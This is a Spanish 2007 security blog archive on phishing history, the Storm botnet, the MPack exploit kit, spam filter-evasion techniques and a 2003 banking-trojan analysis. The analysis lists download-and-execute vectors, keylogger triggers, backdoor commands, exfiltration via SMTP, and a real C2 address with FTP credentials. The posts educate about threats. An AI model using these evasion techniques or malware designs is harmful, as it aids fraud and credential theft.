En el caso de HTTPS, como en SSL la conexión se establece entre la victima y el Proxy atacante, el que puede almacenar toda la información desencriptada, mientras que el Proxy atacante crea su propia conexión SSL con el servidor real.
Para que el ataque man-in-the middle se realice el atacante debe poder dirigir a la victima a su servidor proxy en vez del servidor real. Esto lo puede realizar por varios métodos:

1. Proxies transparentes: Situado en el mismo segmento de la red o localizado en la ruta al servidor real (p.e. Gateway corporativo o ISP intermedio), un Proxy transparente pueden interceptar todos los datos que se negocian por HTTP y HTTPS. No se requiere cambios de configuración en la victima.

2. Envenenamiento Cache DNS: Se utiliza para interrumpir el enrutamiento normal inyectando direcciones IP falsas para los nombres de dominio. Por ejemplo, modificando la tabla de DNS del firewall de Red para que todo el tráfico destinado a la entidad bancaria se resuelva a la dirección IP del servidor atacante.

3. Ofuscación de URL: Utilizando las técnicas de la ofuscación de URL, el atacante engaña al cliente a conectar a su servidor Proxy en vez del servidor verdadero. Por ejemplo, el cliente puede enlazar a una conexión a http://www.mibanco.com.tk/ en vez de http://www.mibanco.com/

4. Configuración del Proxy del Cliente de navegación: Configurando las opciones del navegador y parametrizando una conexión Proxy, el atacante fuerza la navegación a través de dicho Proxy. Es un método no transparente y la victima puede percatarse revisando su configuración e identificar el Proxy agresor. Muchas veces los cambios son realizados a la recepción de un mensaje de Phishing.

Storm, Botnet al servicio del crimen

2007-11-18T21:42:00.000+01:00

Storm, la botnet de lanzamiento de troyanos, ha vuelto a burlar las defensas de los usuarios infectando sus ordenadores con virus y otras amenazas cibernéticas.

Los protegidos de Russian Business Network (RBN), del que se ha hablado tanto en relación al software malicioso y que misteriosamente desapareció la semana pasada después de desplazar sus operaciones desde Sant Petersburgo, Rusia, a Shanghai están involucrados en el ataque, dijo Paul Ferguson, técnico de red de Trend Micro Inc.

El WS GeoCities están infectados con código JavaScript malicioso que redirige el navegador de los usuarios a segundas URLs alojadas en Turquía, dijo Ferguson. Las URLs de Turquía, mientras tanto, tratan de persuadir al usuario para descargar un nuevo codec que supuestamente se necesita para ver las imágenes del los sitios de GeoCities. De acuerdo con el análisis de Trend Micro, el falso codec -- que pretende ser para los 360 grados del formato IPIX -- es en realidad una amenaza cibernética para el robo de información.

Los Fake-códecs se han convertido en la más reciente elección de los phishers, con notable éxito en los confiados usuarios.

Los ataques de la semana pasada, que se originó en las páginas hackeadas de MySpace -- incluida la de la cantante de "R & B Alicia Keys" -- utilizó codecs de sonido.

Storm ha dirigido a "hyping-codecs", dice Ferguson, y los administradores de la botnet son ágiles y flexibles en su enfoque a través de ingeniería social. "Ellos interrelacionan los codecs con otros tipos de ingeniería social", dijo.

Storm se ha convertido en mucho más que un nombre para una familia de virus y otras amenazas cibernéticas, se ha convertido en un canal secreto de distribución para estos delincuentes, dijo Ferguson.

“Es una red de comunicaciones, una manera para que comuniquen la información que desean sembrar,” "Y es una forma de que ellos, para llegar a lo que han recogido" a las nuevas comprometida computadoras, añadió. "Es una red secreta".

Ferguson también dijo que había evidencias que los clientes conocidos de RBN eran responsables de este nuevo mal uso del botnet Storm. “Algunos de los mismos operadores de RBN están implicados,” . “Son miembros del mismo equipo.”

Técnicas de Phishing

2007-11-18T21:17:00.000+01:00

Si nos seguimos centrando en primera instancia al correo electrónico, pero siempre sin olvidar que el inicio del “phishing” puede ser a través de otros servicios:

• Sitio Web
Ejemplo el servidor italiano aruba.it, en junio de este año sufrió un ataque a gran escala usando la herramienta Web Sploit MPACK información desde las páginas de Panda:

Este Kit que se ejecuta en un servidor web que tenga instalado PHP y que dependiendo del navegador utilizado por el usuario, intenta explotar diferentes vulnerabilidades en el equipo de dicho usuario. Hispasec informaba de 11179 Web Sites legítimas comprometidas, es decir que las personas que visitaban dichas páginas y su sistema era vulnerable, eran redireccionadas mediante un IFRAME oculto a otras máquinas donde eran afectadas por la descarga de un troyano con programas capaces de robar información confidencial como la de acceso a la banca electrónica.
El programa malicioso detecta automáticamente el navegador entre los que incluye:
• Internet Explorer
• Opera
• Konqueror
• Lynx
• Netscape
• Mozilla
• Firefox
Y entre los Sistemas Operativos:
• Linux
• Windows
• Windows NT
• Mac
• FreeBSD
La última versión de mPack, 0.90, incluye los siguientes exploits:
• MS06-014
• MS06-006
• MS06-044
• MS06-071
• MS06-057
• WinZip ActiveX overflow
• QuickTime overflow
• MS07-017

Entre los “Top Ten” de las páginas infectadas de la versión 0.90 se encontraba la de la presentadora Marta Torné, lo que provocó gran número de infectados en España.
El código malicioso descargado nos llevaba a servidores alojados en máquinas pertenecientes al Sistema Autónomo de Russian Business Network (RBN), empresa que iremos encontrándonos a lo largo de este artículo.
Este es un método cada vez más popular del ataque de phishing, una Web con contenido malicioso. Esté puede estar incluido dentro de una página Web administrada por el Phisher, o de una página de una tercera parte con un cierto contenido encajado, como en el ejemplo mencionado.
Las técnicas empleadas son tales como:
1) La inclusión de código HTML (tales como el que está presentado en el ejemplo del email de Westpac). dentro de Web site populares, tableros del mensaje.
2) El uso de terceros, o falsificaciones, banners de publicidad para llevar a clientes al Web Site del Phisher (ver técnica siguiente “banners”)
3) El uso de bugs (items escondidos dentro de la página tal como un gráfico de “tamaño-cero”) rastrean a un potencial cliente para un ataque de phishing.
4) Insertar código malicioso dentro de la página Web que explota una vulnerabilidad conocida de los clientes e instala el software del Phishers (p.e. keyloggers, grabadores screen, pertas traseras y otros troyanos).
5) El abuso de relaciones de confianza dentro de la configuración del cliente Web para utilizar los scripts de sitios autorizados o áreas de almacenamiento de datos.
6) El uso de ventanas de publicidad automática (pop-ups) o frameless para disfrazar el origen verdadero del mensaje del Phishers.

• Banners
Otra de las técnicas utilizadas es la inserción de banners publicitarios del servicio de la entidad bancaria que en el hipervínculo nos lleva a la Web-Spoofing.
Los banners de publicidad es un método muy sencillo que los Phishers utilizan para redireccionar a un cliente de una entidad a un Web-Spoofing para capturar la información confidencial. Usando copias de banners publicitarios y colocando en sitios Web populares y algunas técnicas sencillas de la ofuscación de URL para oscurecer el destino final.

• IRC e IM
El aumento de las comunicaciones en tiempo real empleando Internet, ya sea el antiquisimo IRC como el novel y popular IM (Mensajería instantánea) son sistemas que el phisher explota para comunicarse con las victimas y a través de las funcionalidades que incluyen el software de comunicación establecer los vectores del ataque.
Muchos clientes IRC y de IM permiten incorporar contenido dinámico (p.e. gráficos, URL, multimedia, etc.) para enviar a los participantes de un canal, es una tarea trivial emplear muchas de las técnicas de phishing utilizadas en ataques basados en Web.
El uso común de Bots (programas automáticos que escuchan y toman parte en debates en grupo) en muchos de los canales populares, implica que es muy fácil para un Phisher mandar anónimamente información semirelevante de enlaces e información falsa a las potenciales victimas.

• VoIP phishing (vishing - voice phishing)
El vishing es similar al email fraudulento en que el phisher se hace pasar por la entidad bancaria, aquí a través de la voz simula una aparencia y conjugando técnicas de ingeniería social redirige a la victima a sus propositos, como que se conecte a la WebSpoofing, se baje el software malicioso o simplemente a través de telefonía le facilite los datos confidenciales. Tambien el ataque puede venir a través de otro servicio (IM, email, …) y desviar al usuario a un control telefónico.

• Resultados de busquedas
El emplear técnicas de promocionar la respuesta en buscadores es una de las técnicas utilizadas para que el usuario al buscar un servicio o página Web encuentre el resultado del phisher y así encaminarle a su interés para sonsacarle la información.

• Tablones de anuncios, foros de noticias, redes sociales
La inserción de mensajes con carga de Ingeniería social, recomendando acciones que conllevaran a situaciones de exposición al peligro en vez del propósito de la victima con la realización de la actividad que pensará que con esa acción realizaría la actividad propuesta por el phisher.

• Descarga de software a través de servicios de Internet
Los fakes, o software falseado, es otra de las técnicas utilizadas para insertar código malicioso en las máquinas de las victimas. El uso masivo de clientes de intercambio de ficheros hace que sea muy fácil la distribución de estos malwares.

• Phishing por equipos troyanizados
Mientras el medio de destino del ataque de phishing se puede variar, el origen del mismo cada vez más es utilizado PC’s comprometidos Cuando un Troyano ha sido instalado permite al phisher (junto con remitentes de spam, programas warez, Bots de DDoS, etc.) utilizar la computadora personal como un propagador de los mensajes. Consecuentemente, el rastreo al iniciador del ataque de Phishing es muy difícil.
Los equipos troyanizados va en aumento a pesar de las empresas antivirus. Las redes criminales han desarrollado técnicas de éxito para engañar a los usuarios e instalen el troyano. Ahora operan grande redes troyanizadas (pasar de más de mil equipo no es una rareza) capaces de lanzar emails de phishing o servir de alojamiento de Web-Spoofings.
Esto no quiere decir que un Phishers no utilice troyanos contra un cliente para observar específicamente su información confidencial.
De hecho, para recoger la información confidencial de varios miles de clientes simultáneamente, el Phishers debe ser selectivo acerca de que información desean almacenar o tendría una sobrecarga de información.

Metodología del engaño

2007-11-18T21:07:00.000+01:00

Hasta ahora hemos visto la historia del phishing y como evoluciono desde los primeros engaños hasta el empleo de sofisticación técnica. Veamos como esclarecemos algunas técnicas que nos ayudaran a identificar ante caso nos podemos encontrar, para ello iremos clarificando algunos conceptos que hemos estado empleando:

El Método inicial es el conseguir los datos confidenciales que permitirán el acceso a las cuentas bancarias a través de Internet, para ello se puede recurrir a uno de los servicios más utilizados en la red que es el correo electrónico, pero sin olvidar otros servicios emergentes que están siendo objeto también del phishing que son, entre otros, la Mensajería Instantánea, los foros de noticias, las redes sociales, los buscadores, el P2P, las páginas Web,…

Dentro de la subcategoría por correo electrónico debemos subdividir en dos modalidades mediante correo electrónico selectivo o mediante SPAM, en ambos casos el mail debe incorporar la estrategia de captura y a través de un HOAX, engaño o bulo, lo que llamaremos Ingeniería Social, conseguir que la carga actué:

Esta carga adicional que incorpora el email puede ser código de captura en el mismo correo, redireccionamiento a otra ubicación para inocular código malicioso o capturar los datos por una falsa Web (Web Spoofing). El código malicioso puede realizar modificaciones de los mecanismos de traducción de los nombres de dominios y resolver el recurso en Internet a su interés malicioso, es lo que se ha venido a llamar “Pharming”, o bien modificar el comportamiento de la máquina infectada agregando servicios y procesos que daran una operatividad a la misma de acuerdo a la función maliciosa a desarrollar, ejemplo de esto es el caso de noviembre de 2003 con la modificación de un troyano que habilitaba a la máquina infectada a actuar como máquina zombie, además de hace correr un keylogger cuando la misma se conectaba a direcciones de Internet que contenía una de las palabras claves de monitorización y que se correspondía con entidades financieras.

En síntesis estos correos electrónicos se basan principalmente en dos técnicas underground, el SPAM y la Ingeniería Social.

El Spam se basa en trabajar con gran cantidad de victimas potenciales, también se le conoce como Junk mail, o correo basura, y esta apareciendo en otras modalidades de comunicación como la mensajería instantánea (SPIM), Servicios de mensajes cortos (SMS Spam), Telefonía IP (SPIT).
Como características básicas encontramos:
- Dirección del remitente no conocida y habitualmente falseada
- Mensaje no suele tener dirección reply
- Presenta un asunto llamativo
- Mayor parte del Spam era en inglés aunque ahora aparece en otros idiomas
Emplean para su difusión técnicas anti-antispams:
- Envío de correo - verificación de la recepción
- Servidores de correo vulnerables o mal configurados, en concreto los que están configurados como Open Relay, que no necesitan usuario y contraseña para ser utilizados y que permiten a cualquier usuario enviar mensajes sin comprobar su remitente (que normalmente estará falsificado). Existen Open Relay Database
- Open proxies
- Ordenadores comprometidos por malware: determinados malware realizan acciones encaminadas a permitir el envío de spam a través de los ordenadores que afectan, como la instalación de servidores proxy. Incluso es posible alquilar el uso de botnets, verdaderas redes de ordenadores afectados por bots (híbridos de gusanos, troyanos y backdoors).
- Suplantación (spoofing), camuflaje (munging)
- Ataques del tipo DDoS (distributed denial-of-service) contra servicios DNSBL y otras fuentes anti-spam
- Emplear configuraciones deficientes de servicios DNS
- Emplear dominios caducados
- NDR falso (notificación de entrega fallida -Non-Delivery Report)
- Mensajes con sólo un archivo con extensión ‘.jpg’ o ‘.gif’
- Envío alfabético (mensajes enviados a grupos en orden alfabético)
- Envío horizontal (muchos mensajes enviados a muchos grupos)
- Envío vertical (muchos mensajes enviados a un grupo)
- Crosspost (un mismo mensaje se envía una vez a varios grupos)
- Multi-Post (un mismo mensaje se envía varias veces a varios grupos)
- Hash Buster (contenido válido mezclado con contenido errático)
- Payload (la parte del spam que realmente se difunde)
- Enviar mensajes y cerrar cuentas
- División de la línea de Asunto del mensaje mediante falsos saltos de línea
- Uso de caracteres nulos (codificación de tipo Quoted-Printable)
- Encapsular una etiqueta "map" con una de tipo HREF, de tal forma que en lugar de una URL maliciosa aparezca otra legítima
- Permutar letras en las palabras usadas. El mensaje sigue siendo legible para el receptor, pero los filtros no reconocen las palabras usadas
- Uso de caracteres ASCII para “dibujar” el contenido del mensaje
- Invertir el texto, utilizando la anulación derecha-a-izquierda (right-to-left override) de Unicode, expresada como entidades HTML (‮ y ‬)
- Uso de etiquetas HTML incorrectas
- Codificación de URLs
- Empleo de entidades HTML para ocultar determinadas letras
- Uso de tinta invisibles
- Incluir el mensaje de spam como archivo adjunto en otro mensaje válido
- Uso de CSS (Cascading Style Sheets) en los mensajes de spam para ocultar determinadas palabras o partes del mensaje.
Como se distribuye:
- Empleo de robots (programas automáticos), que recorren Internet en busca de direcciones en páginas web, grupos de noticias, weblogs, etc
- Trampa de spam (opción preseleccionada por defecto en un formulario online)
- Sitios web que solicitan información para brindar un determinado servicio
- Hacer clic en ‘Aceptar’ sin leer la letra pequeña y sin desmarcar lo no deseado
- Servicios gratuitos de descarga (warez)
- Suscripciones por Internet (opt-in)
- Grupos de noticias, foros de discusión, listas de correo ((el spammer después de darse de alta anota el resto de usuarios del grupo)
- Técnicas de DHA (Directory Harvest Attack): el spammer genera direcciones de correo electrónico pertenecientes a un dominio específico
- Compra de bases de datos de usuarios a particulares o empresas
- Encuestadoras (de opinión)
- Chat, juegos en línea
- Cadenas y difusión de cadenas
- Entrada ilegal en servidores
- Por ensayo y error, ataque por diccionario
- Virus, spyware, cookies, phishing
- Otros
La Ingeniería Social se basa en el error humano y se trata de conseguir a través de los sentimientos o de la confusión, de esa forma rompemos la cadena de la seguridad por este eslabón, que muchos consideran como el más débil. Se apoya en que la gente tiende a ayudar, en primera instancia es confiada, no le gusta decir que no, le gusta que les elogien y se dejan llevar por los sentimientos como la ambición, la curiosidad, el miedo, la codicia, la vergüenza, la solidaridad, la compasión, la lujuria, ,,,
El empleo de SPAM con un bulo (HOAX) de forma que el receptor abra, lea, obedezca o simplemente realice lo que ha planificado el remitente es lo que se conoce como SCAM.

Evolución del SCAM para el Phishing 3

2007-11-10T12:04:00.000+01:00

En noviembre de 2003 aparecen los primeros casos de ataque a la banca On-Line, donde se envía un fichero con contenido malicioso, lo que es conocido como “troyano” para hacer phishing de la información bancaria. El troyano fue distribuido selectivamente a Pimes con actividad en Internet.
Ese ataque de email selectivo introducía el troyano embebido en código HTML y aprovechando la vulnerabilidad del manejador MHTML, de este modo fue posible incluir un script en el archivo, y ejecutarlo en la zona local. El troyano era una variante del Spy-Tofger, ZINX y VBS/Psyme, con los siguiente métodos de infección:

Accediendo a una página Web donde está el código malicioso.

A través de un email con el código malicioso en HTML o con el enlace a la Web

Mediante la instalación y ejecución de un programa Visual Basic Script (.vbs) por cualquier otro método distinto a Web o email

Por la Web http://66.227.73.44 empleaba 2 vectores de infección:

Graba 1.gif a C:\Program File\Windows Media Player\vmplayer.exe” y redirige a la url “mms://” que lanza el “Media Player”, mejor dicho el programa recien grabado.

Carga “downkiller.php” (bug de .hta de IE, guarda y ejecuta un .vbs que descarga 1.gif a q.exe y lo ejecuta, borrando el fichero si ya existe

Al ejecutar el programa descargado se realizaban las siguientes acciones:

Se copian 4 ficheros: system.exe, svchostc.exe, svchosts.exe y msto32.dll.

Se añade una referencia en el registro para que se ejecute al arranque el system.exe

Crea el identificador del usuario local con el formato:
ddddmmmmyyyyhhhhMMMMssss, donde los 4 bytes “dddd” son el día, “mmmm” el mes, “yyyy” el año, “hhhh” la hora, MMMM los minutos y “ssss” los segundos, los valores se cumplmentan con ceros por delante. Por ejemplo: 00230011200312520027

Recupera la identificación del registro:
HKEY_LOCAL_MACHINE\Software\Microsoft\Mserv “IDWin”

system.exe al ejecutarse:
a. Ejecuta los ficheros svchosts y svchostc
b. Utiliza la librería msto32.dll para captura de teclas
c. Crea y utiliza el fichero “c:\winnt\sysini.ini” como almacén de las capturas
d. Acepta conexiones al puerto 10002 y permite la ejecución de varios comandos:
i. RUNF: Ejecuta comando
ii. PROC: Lista procesos
iii. LIST: Lista ficheros
iv. FIND: Busca fichero
v. DELE: Borra fichero
vi. DOWF: Carga fichero o directorio a un sitio FTP remoto: IP: 66.227.73.44, Usuario: jkrikho, Contraseña: kBwSB6xQ
vii. UPLF: Descarga fichero de un sitio FTP o WEB remoto
viii. UPDT: Descarga de actualización de troyano
e. Envía la siguiente petición HTTP, a modo registro:

Banesto, ebankinter, Sabadell, Santander Central, kutxanet, BBVA net Office, Login Page, Bank of China, online@hsbc, HSBC in HongKong, AIG Credit Card, Citybank HongKong, Bank y qweqwe121312 En el momento que el usuario infectado se encuentra en Internet y pulsa una tecla, comprueba si el título de la ventana actual (el tag de una página Web genera el título) (en primer plano) contiene alguna de las subcadenas de caracteres que tiene almacenadas:

Si encuentra alguna de las subcadenas anteriores:
a. Se guarda a disco el contenido del portapapeles, el título de la ventana y la tecla que se ha pulsado y a partir de aquí se guardan las pulsaciones hasta que se cambia el título de la ventana.
b. Cada 30 seg y cuando esta conectado a Internet realiza:
i. Reejecuta los ficheros svchostc y svchosts si fuese necesario
ii. Comprueba la longitud del fichero sysini.ini y si es mayor de 200 bytes hace lo siguiente:
1. Abre conexión TCP contra la dirección 194.67.23.10 (smtp.mail.ru)
2. Compone mensaje con las directivas del protocolo SMTP:

Keylogger “msto32.dll” es la librería encargada de realizar la captura del teclado, utilizada por el fichero system.exe, está librería se utiliza también en el troyano Spy-Togfer.

Proxy “svchosts.exe” es lanzado por system.exe y pone a la escucha en el puerto 4488/tcp, servicio proxy peticiones HTTP y HTTPS.

Proxy “svchostc.exe” es lanzado por system.exe y pone a la escucha en el puerto 3388/tcp, servicio SOCKS, similar a PROXY pero orientados a servicios no http.
Como se ve en el código la Organización delictiva a través del email spaintroi@mail.ru tenía los datos confidenciales de las victimas, solo les quedaba realizar los apartados “b” (transferencia del capital a otra cuenta) y “c” (sacar el dinero del país victima al país de la organización).

Evolucion del Scam para el Phishing 2

2007-10-29T00:55:00.000+01:00

Durante ese año se elevan consideradamente el número de scams a ebay y Paypal

Cuya cabecera técnica refleja el spoof:

Return-Path:
Delivered-To: webmaster@millersmiles.co.uk
Received: (qmail 21262 invoked from network); 6 Jun 2003 21:21:49 -0000
Received: from unknown (HELO mail.almtal.net) (217.16.118.12)
by server16.donhost.co.uk with SMTP; 6 Jun 2003 21:21:49 -0000
Received: from localhost (mail.almtal.net [127.0.0.1])
by mail.almtal.net (8.11.6/8.8.7) with SMTP id h56LRD008495
for ; Fri, 6 Jun 2003 23:27:16 +0200
Message-Id: <200306062127.h56lrd008495@mail.almtal.net>
From:
To:
Subject: ebaY Contest
Date: Fri, 6 Jun 2003 23:27:13 +0200
X-Mailer: sendEmail-1.40
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
HELO mail.almtal.net) (217.16.118.12) es una conexión no desde el servidor de correo de ebay el cual es: “mx5.smf.ebay.com and IP address 66.135.209.200”, sino que viene de una máquina en Viena.

También la línea: Received: from localhost (mail.almtal.net [127.0.0.1]), indica que se usa un mail Server interno en la propia máquina.

Al teclear en el link nos llevaba a la página con el formulario siguiente:

Si cumplimentabamos el mismo y lo enviabamos la información era capturada por el phisher.

• Tampoco Yahoo! Se libro ese octubre de 2003 de recibir Scams:

Donde el link también llevaba a una WebSpoofing con formulario de captación de datos:

• Y también en el 2003 aparecen los primeros phishings de datos de entidades bancarias que operaban por Internet:

Estimado cliente de BBVA,
Le comunicamos que próximamente, usted no se podrá subscribir en
Banca Online. BBVAnet es el servicio de banca a distancia que le
ofrece BBVA, disponer de este servicio le permitirá consultar su
saldo, productos y realizar las transacciones bancarias mas habituales desde su ordenador, en cualquier momento, con toda la seguridad que BBVAnet le ofrece, a través de Internet.
Si usted desea tener la oportunidad de poder registrarse en BBVAnet,
por favor acceda al sitio que se muestra a continuación.
http://w3.grupobbvanet.com/

Si usted decide registrarse en nuestra banca online BBVAnet, se le
contactara telefónicamente después de 24/48 horas confirmándole su
subscripción y le llegara una carta por correo con la información
correspondiente para que pueda acceder a su banca online en BBVAnet.
© BBVAnet 2000-2003 All rights reserved
© Banco Bilbao Vizcaya Argentaria S.A. 2000-2003 All rights reserved
Donde se observa el parecido del dominio de la WevSpoofing con el real:
grupobbvanet.com (falso) VS bbvanet.com (real)

OTRO:

CONTINUARA ...

Evolución del Scam para el Phishing

2007-10-19T22:16:00.000+02:00

La Historia del Phishing es tan antigua como Internet, la picaresca para conseguir obtener privilegios gratuitos en páginas de pago, en servicios y en cualquier espacio protegido por datos confidenciales ha llevado a los phishers a desarrollar técnicas de Ingenieria Social apoyadas a veces por técnicas de harding para engañar al usuario y conseguir, de esta manera,los datos confidenciales.

* Las primeras referencias publicadas se remontan a las cuentas de AOL al principio de los años 90.

* 1996 Un phisher se hacía pasar como un empleado de AOL y enviaba un mensaje instantáneo a una víctima potencial. Para poder engañar a la víctima de modo que diera información confidencial, el mensaje podía contener textos como "verificando cuenta" o "confirmando información de factura". Una vez el usuario enviaba su contraseña, el atacante podía tener acceso a la cuenta de la víctima y utilizarla para varios propósitos criminales, incluyendo el spam. Tanto el phishing como el warezing en AOL requerían generalmente el uso de programas escritos por crackers, como el AOLHell.

* En 1997 AOL tomo medidas contra el phishing de forma que añadieron en su sistema de mensajería instantánea, una línea que indicaba que "no one working at AOL will ask for your password or billing information" ("nadie que trabaje en AOL le pedirá a usted su contraseña o información de facturación").

* En mayo de 2001 aparecieron Scams para conseguir las contraseñas de hotmail:

You're one of 100 hotmail winners!

"Usted es uno de 100 ganadores de hotmail", es lo que el mensaje avisa, y "solo" nos pide, que para hacernos acreedor a un regalo, llenemos el formulario adjunto en el texto HTML, con nuestro nombre de usuario de Hotmail, contraseña, un comentario, e incluso ¡una foto nuestra!.

El mensaje lo firma supuestamente el "Hotmail Staff", pero en realidad, proviene de la dirección "max@relay.1c.kiev.ua", y el código HTML recibido, posee un link a la dirección http://193.125.79.67/, la que corresponde según los registros a Tara Shevchenko Kiev University, 01033 Kiev, Ukraine.

* En julio de 2001 AOL informaba sobre un SCAM donde el usuario recibía un mensaje de su proveedor de servicios, donde se le indica que existe un error en el registro de sus datos, y que para poderle facturarle correctamente, y evitar ser dado de baja, debe actualizarlos a la brevedad. En el mensaje se muestra un link aparentemente legal a una página de facturación del propio America On Line. Si usted pulsa en el link, en su navegador se abre esta página, exactamente igual a las páginas oficiales de AOL. Allí, se le dan más detalles del presunto problema con sus datos; se le pide cortésmente disculpas por las molestias causadas; se promete que la información que el cliente estará ingresando será encriptada y solo usada por AOL; y luego se le advierte en una forma muy destacada que la dirección actual de su computadora ha sido registrada y guardada en un archivo de registro (log) para protegerlo a usted de cualquier tipo de fraude.

* También en julio de 2001 apareieron los siguientes mensajes: "Ante el asalto de un grupo de 'hackers' que robó la base de datos de MSN España sentimos comunicarle que debe mandarnos un 'e-mail' con su nombre, apellidos, dirección de 'e-mail' y contraseña antes del 15 de julio. Quien no realice dicho trámite será suprimido de nuestra base de datos."

* En junio de 2002 fueron los usuarios de ICQ quienes estuvieron en peligro al recibir un e-mail que muestra la dirección activation@icq.com y el asunto "IMPORTANT: Your Account Activation Status". El cuerpo del mensaje estaba muy bien preparado y no era diferente del sitio de ICQ. En la parte central había un formulario para el número de usuario (UIN) y su contraseña. Un script codifica una dirección Web y envía la información a la cuenta l3reA2002@hotmail.com, pudiendo ser usados para el robo de información, además de permitir al atacante apropiarse del número identificador y asumir falsas identidades.

* En octubre de 2002 Yahoo informó a la prensa que algunos de sus clientes recibieron un correo electrónico distribuido en forma masiva, en donde se les pedía dar sus números de tarjetas de crédito a supuestos integrantes de la compañía.

* En marzo de 2003 eBay informaba que los usuarios de su portal recibieron mensajes que simulaban ser alertas oficiales de PayPal. Estos mensajes, con todo desparpajo, solicitaban a los destinatarios que remitieran sus datos bancarios y números de tarjetas de crédito. Los correos electrónicos incluían el logo de las compañías, así como enlaces a sus páginas de Internet, y con un diseño muy similar al de los sitios originales. El texto del mensaje anunciaba a los destinatarios que sus cuentas de PayPal habían sido "seleccionadas al azar para ciertos trabajos de mantenimiento" (sic), y por ello, las mismas habían sido puestas en un modo al que llamaban "de acceso limitado". El mensaje, que parecía provenir de la dirección "info@paypal.com", pedía al usuario que introdujera el número de su cuenta bancaria y tarjeta de crédito en un formulario "en línea", incluido en el "e-mail".

CONTINUARA ...

MPACK contra la Banca Online

2007-06-23T12:02:00.000+02:00

Websense® Security Labs™ informaba hace pocos días el ataque a gran escala usando la herramienta Web Sploit MPACK información desde las páginas de Panda:

http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf

Detecta automáticamente el navegador entre los que incluye:

* Internet Explorer

* Opera

* Konqueror

* Lynx

* Netscape

* Mozilla

* Firefox

Y entre los Sistemas Operativos:

* Linux

* Windows

* Windows NT

* Mac

* FreeBSD

La última versión de mPack, 0.90, incluye los siguientes exploits:

* MS06-014

* MS06-006

* MS06-044

* MS06-071

* MS06-057

* WinZip ActiveX overflow

* QuickTime overflow

* MS07-017

Entre los top ten de las páginas infectadas de la versión 0.90 se encontraba la de la presentadora Marta Torné, lo que ha provocado gran número de infectados en España.

El código malicioso descargado nos lleva de nuevo a servidores alojados en máquinas pertenecientes al Sistema Autónomo de Russian Business Network (RBN), responsable también de la distribución del Troyano Anserin/Sinowal/Torpig.

SIT-1 The truth is not single real, also can be digital!

Intervención Juan Carlos Ruiloba en el IV Foro de las evidencias electrónicas

2007-06-18T20:42:00.000+02:00

CIBERINTELIGENCIA CRIMINAL

“Intercambiando ideas no solo las sumamos, como decía Bernard Swaw, sino que añadimos algo más, que es el establecer nuevos elementos catalizadores de la multiplicación del desarrollo intelectual.”

Contenido:
1.- Introducción
2.- Ciberinteligencia
3.- Tendencias Tecnológicas
4.- Dificultades de Investigación
5.- Cibercrimen
6.- Ciberinteligencia como solución al Cibercrimen

1.- Introducción
La información ha sido, es y seguirá siendo el combustible del desarrollo de la humanidad y las nuevas tecnologías han influido en catalizar dicho desarrollo. La globalidad de las comunicaciones han roto las fronteras y las barreras idiomáticas, permitiendo un flujo de Información inconmesurable y con gran rapidez de difusión.
Por el contrario la Sociedad no ha podido ni ha sabido adecuarse a esta nueva situación con suficiente garantía de Seguridad, con lo que nos encontramos en un Mundo altamente dinámico y tecnológico donde los ciudadanos conjugan esa disponibilidad con la incertidumbre, preocupación, desconfianza, insuficiencia o inadecuación de las normas legales que se traduce en un potencial peligro de la Seguridad y la Garantía de los Derechos Humanos.
Como se puede paliar esta situación, ahora que se habla del Cambio climático y que todavía hay tiempo de subsanar o paliar el problema, debemos también ser conscientes de que el cambio tecnológico también puede implicar peligros para la Sociedad y debemos reunirnos para conocer dichas amenazas, darlas a conocer y crear soluciones en el marco de todos los aspectos posibles.

2.- Ciberinteligencia

La Cibertinteligencia nos permite el conocer y evaluar las amenazas tecnológicas así como su evolución pudiendo sacar análisis y proyecciones mediante la extrapolación de las situaciones futuras, para adelantarnos a las problemáticas futuras y servir de prevención.

Esta estrategia para contraatacar los nuevos cibercrimenes tiene un factor que es la dificultad de hallar la continuidad necesaria en un entorno permanentemente cambiante; los análisis tácticos vinculados a las particularidades espaciales y geográficas, requiere una abstracción virtual del mundo digital; y por último, el análisis operativo y dentro de éste, la capacidad para determinar la autoría, se complica de modo evidente en este medio.

El fin prioritario de la Ciberinteligencia es conseguir entender el funcionamiento actual y futuro de la Red, lo que lleva a que continuamente la Inteligencia debe crecer con la misma velocidad que los desarrollos de las nuevas tecnologías, debe transformarse con ella para mantener la capacidad de identificar las amenazas y las contra-amenazas, vulnerabilidades y respuestas frente a éstas, así como los factores desencadenantes de las distintas actuaciones maliciosas, esto solo se puede obtener con la suma de esfuerzos de aquellas personas que se adhieran a esta labor preventiva y bajo el marco de esta colaboración se pueden romper todas aquellas barreras que ahora se levantan y se vislumbran prácticamente infranqueables.

La Ciberinteligencia debe crecer con una premisa que no se debe olvidar:

“No hay que creer que hoy en día podemos abstraer las nuevas tecnologías de la Información de cualquier hecho que acontezca, ya que directa o indirectamente encontraremos vestigios de aquélla”.

3.- Tendencias Tecnológicas

Estas nuevas corrientes delictivas que hacen valer el déficit de seguridad de Internet están apoyadas en el difícil seguimiento de las pistas por la multitud de servicios, el dinamismo incremental tecnológico y la globalización virtual de la Red.

Las tendencias presentes y futuras que se detectan son:
• El cambio constante de la tecnología y los medios de comunicación
• El alcance popular de la tecnología.
• La aparición de nuevas formas de relaciones comerciales y sociales.
• La globalización y pérdida de relevancia de las fronteras nacionales.
• La lenta implementación de las políticas de control y cooperación

A nivel criminal también existen las siguientes tendencias:

• La globalización como elemento multiplicador de acción delictiva y beneficio de las acciones criminales
• El incremento de la utilización de las nuevas tecnologías para usos ilícitos gracias a la facilidad de la acción a distancia y la no presencia física del autor de los hechos, que le proporciona una sensación de anonimato e impunidad
• La posibilidad de asociación y cooperación en el negocio delictivo utilizando estos medios tecnológicos.

4.- Dificultades de Investigación

Hace dos años en un foro parecido hable de las dificultades de investigación que ofrecían algunos servicios de Internet que eran utilizados o que en esa época emergían, tales como los Foros, P2P, IRC, entre otros, sin olvidar el correo electrónico y los programas de Mensajería Instantánea, sin olvidar estos hay que empezar a vislumbrar los nuevos servicios y los retos que nos deparan como los mundos virtuales como Second Live, Wonderland inclusión de aplicaciones para el trabajo colaborativo o Hipihi en China, Redes Sociales como la coreana CyWorld, Web 2.0 , VoIP, Blogs o Weblogs, Wiki’s, Social Software, o la VR en la Web 3.0.

Todas estas tecnologías hacen y acercan la tecnología a las relaciones humanas y son fuentes de interacción con los ciudadanos y un foco de acción maliciosa.

